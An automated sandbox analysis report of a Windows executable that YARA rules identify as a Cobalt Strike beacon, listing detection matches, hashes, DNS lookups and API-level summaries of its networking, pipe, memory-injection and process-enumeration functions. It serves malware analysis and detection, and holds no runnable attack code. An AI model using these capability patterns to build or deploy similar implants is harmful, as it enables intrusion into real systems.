               Jan 1, 2025 02:04:54.730293036 CET | 1.1.1.1 | 192.168.2.4 | 0x9c3f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
               Jan 1, 2025 02:04:54.730293036 CET | 1.1.1.1 | 192.168.2.4 | 0x9c3f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
               Jan 1, 2025 02:05:11.177144051 CET | 1.1.1.1 | 192.168.2.4 | 0x9165 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false


              Target ID:0
              Start time:20:04:35
              Start date:31/12/2024
              Path:C:\Users\user\Desktop\2VsJzzWTpA.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\2VsJzzWTpA.exe"
              Imagebase:0x400000
              File size:328'704 bytes
              MD5 hash:791BBE51360BB7AFBE10C8DAF7AD6B5C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false


                Execution Graph

                Execution Coverage:1.9%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:11.5%
                Total number of Nodes:314
                Total number of Limit Nodes:19

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID: 0PE$@6E$DCE
                • API String ID: 649803965-2430247936
                • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

                Control-flow Graph

                APIs
                • _snprintf.LIBCMT ref: 0066E725
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                  • Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5
                • _snprintf.LIBCMT ref: 0066E7BD
                • _snprintf.LIBCMT ref: 0066E7D4
                • HttpOpenRequestA.WININET ref: 0066E818
                • HttpSendRequestA.WININET ref: 0066E84A
                • InternetQueryDataAvailable.WININET ref: 0066E87A
                • InternetCloseHandle.WININET ref: 0066E898
                  • Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
                  • Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C
                  • Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
                  • Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3
                • InternetReadFile.WININET ref: 0066E8D4
                • InternetCloseHandle.WININET ref: 0066E8F5
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 3536628738-856325523
                • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                • Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
                • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                • Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                • String ID: %s%s%s
                • API String ID: 1671524875-1891519693
                • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                • Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
                • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                • Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748

                Control-flow Graph

                APIs
                • CryptAcquireContextA.ADVAPI32 ref: 006611B8
                • CryptAcquireContextA.ADVAPI32 ref: 006611DC
                • CryptGenRandom.ADVAPI32 ref: 006611F0
                • CryptReleaseContext.ADVAPI32 ref: 00661204
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$Acquire$RandomRelease
                • String ID: ($Microsoft Base Cryptographic Provider v1.0
                • API String ID: 685801729-4046902070
                • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                • Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
                • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                • Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                • String ID:
                • API String ID: 2239253087-0
                • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

                Control-flow Graph

                APIs
                • malloc.MSVCRT ref: 004017B9
                • SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                  • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                  • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                • GetTickCount.KERNEL32 ref: 004017FC
                • CreateThread.KERNEL32 ref: 00401885
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                • API String ID: 3660650057-1020837823
                • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

                Control-flow Graph

                APIs
                  • Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A
                • InternetOpenA.WININET ref: 0066EB0C
                • InternetSetOptionA.WININET ref: 0066EB2C
                • InternetSetOptionA.WININET ref: 0066EB44
                • InternetConnectA.WININET ref: 0066EB7A
                • InternetSetOptionA.WININET ref: 0066EBB7
                • InternetSetOptionA.WININET ref: 0066EBE2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Internet$Option$ConnectOpenRevertSelf
                • String ID:
                • API String ID: 1513466045-0
                • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                • Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
                • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                • Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04

                Control-flow Graph

                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                • malloc.LIBCMT ref: 0066CB3B
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
                  • Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
                  • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
                  • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311
                  • Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE
                  • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                  • Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07
                  • Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF
                • malloc.LIBCMT ref: 0066CC4A
                • _snprintf.LIBCMT ref: 0066CCC1
                • _snprintf.LIBCMT ref: 0066CCE7
                • free.LIBCMT ref: 0066CEC6
                  • Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
                  • Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F
                  • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
                  • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A
                • _snprintf.LIBCMT ref: 0066CD0E
                  • Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
                  • Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                • String ID:
                • API String ID: 548016584-0
                • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                • Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
                • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                • Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: IoctlSocketStartupclosesocket
                • String ID:
                • API String ID: 365704328-0
                • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                • Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
                • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                • Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: Virtual$AllocCreateProtectThread
                • String ID:
                • API String ID: 3039780055-0
                • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: File$CloseCreateHandleRead
                • String ID:
                • API String ID: 1035965006-0
                • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CleanupStartup
                • String ID:
                • API String ID: 915672949-0
                • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                • Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
                • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                • Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                • Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
                • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                • Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00

                Control-flow Graph

                APIs
                  • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                  • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                  • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: Sleep$CountCreateThreadTickmalloc
                • String ID:
                • API String ID: 345437100-0
                • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
                • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                • Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
                • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                • Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11
                APIs
                • GetCurrentProcess.KERNEL32 ref: 00678FA0
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
                • Process32First.KERNEL32 ref: 00678FFB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                • API String ID: 718051232-1833344708
                • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                • Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
                • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                • Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 00683002
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _fileno.LIBCMT ref: 0068302F
                  • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                  • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                • write_multi_char.LIBCMT ref: 0068366B
                • write_string.LIBCMT ref: 00683688
                • write_multi_char.LIBCMT ref: 006836A5
                • write_string.LIBCMT ref: 00683704
                • write_string.LIBCMT ref: 0068373B
